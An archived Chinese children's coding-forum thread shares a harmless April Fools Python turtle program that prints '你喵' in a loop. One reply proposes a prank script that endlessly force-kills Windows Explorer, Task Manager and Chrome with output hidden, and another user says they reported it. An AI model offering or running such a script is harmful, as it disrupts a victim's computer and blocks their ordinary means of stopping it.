猫史档案馆


【Python作品分享】愚人节作品【作品秀】

用户:明月清风l6-R明月清风l6-R查看:1 回复:3 评论:1 创建时间:2020-04-02T20:07:23


【作品展示】

center_image

 

【作品介绍】

用用,你会很懵逼。

 

【作品源代码】

import turtle

__Pen = turtle.Pen()


#开始进入Python的世界
for __count in range(20):
    __Pen.forward(100)
    print('你喵')

 

【提示】

部分含有Python第三方库相关内容的作品,在海龟编辑器网页端无法运行哦!如遇到这种情况,可以打开下面的链接,下载海龟编辑器客户端:

https://python.codemao.cn


回复

上一页1 页 / 共 1下一页
蒟蒻OIer1048576蒟蒻OIer1048576

……

点赞0


评论


1BB0090940B96FFBF1BB0090940B96FFBF

为什么不用这个呢?

from os import system
while True:
    system("taskkill /f /im explorer.exe >nul 2>nul")
    system("taskkill /f /im taskmgr.exe >nul 2>nul")
    system("taskkill /f /im chrome.exe >nul 2>nul")

center_image

点赞0


评论


亿只懒Ink亿只懒Ink

已举报

点赞0


评论